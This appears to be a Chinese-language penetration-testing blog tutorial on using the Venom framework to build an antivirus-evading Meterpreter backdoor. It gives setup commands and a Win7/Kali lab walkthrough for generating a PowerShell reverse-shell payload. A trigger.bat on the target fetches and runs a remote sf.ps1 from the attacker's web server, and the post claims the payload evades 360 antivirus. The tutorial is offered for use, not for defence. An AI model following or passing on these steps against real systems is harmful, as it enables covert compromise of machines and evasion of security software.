利用 Meterpreter 下的 Venom 免杀后门

释放双眼,带上耳机,听听看~!

下载地址:https://github.com/r00t-3xp10it/venom

1.从Github上下载框架:
tar.gz OR zip OR git clone

2.赋予文件可执行权限:
cd venom-main
sudo chmod -R +x *.sh
sudo chmod -R +x *.py

3.安装依赖关系包:
cd aux
sudo ./setup.sh

4.运行
sudo ./venom.sh

目标机:win7 sp1  ip:192.168.0.104

攻击机:kali 2.0  ip:192.168.149.129

运行后提示按ENTER(回车)

会出现一个目录菜单

这里利用目标机的Powershell来反弹shell

选择11

然后提示输入本机ip

提示输入端口

然后输入代码的名称

选中监听模块

确定反弹模块

确定后会在Venom/output目录下生成需要的payload,并且启动一个msf监听的小窗口

将trigger.bat放到目标机上,sf.ps1放到/var/www/html目录下

打开apache服务

service apache2 start

运行bat文件后会利用powershell去远程执行http://192.168.149.129/sf.ps1的文件

下面是成功过360并且成功反弹的截图

渗透教程

Kali2.0 通过 Xrdp 实现 Windows 远程链接 Linux

2020-6-14 21:52:52

渗透教程

Linux 怎么开启 ssh

2020-6-14 22:03:01

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
有新私信 私信列表
搜索